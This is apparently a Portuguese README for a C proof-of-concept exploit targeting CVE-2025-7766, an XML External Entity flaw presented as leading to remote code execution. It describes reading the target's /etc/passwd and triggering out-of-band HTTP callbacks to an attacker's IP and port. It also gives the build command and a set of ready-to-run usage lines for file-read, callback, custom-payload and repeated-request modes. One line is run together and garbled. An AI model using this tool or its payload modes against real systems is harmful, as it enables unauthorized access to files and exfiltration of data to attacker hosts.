
PoC de exploração em C para o CVE-2025-7766 que demonstra XXE-para-RCE via leitura de arquivos e callbacks HTTP fora de banda. Suporta payloads XML personalizados e solicitações repetidas.
PoC para explorar a vulnerabilidade de Entidade Externa XML (XXE) na CVE-2025-7766. Demonstra leitura de arquivo (/etc/passwd) e callbacks HTTP fora-de-banda.
Autor: Byte Reaper
CVE: CVE-2025-7766
Vulnerabilidade: Execução Remota de Código via Entidade Externa XML (XXE)
/etc/passwd do alvo.gcc -o exploit exploit.c argparse.c -lcurl
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT
# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r
# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'
# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5
# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
MIT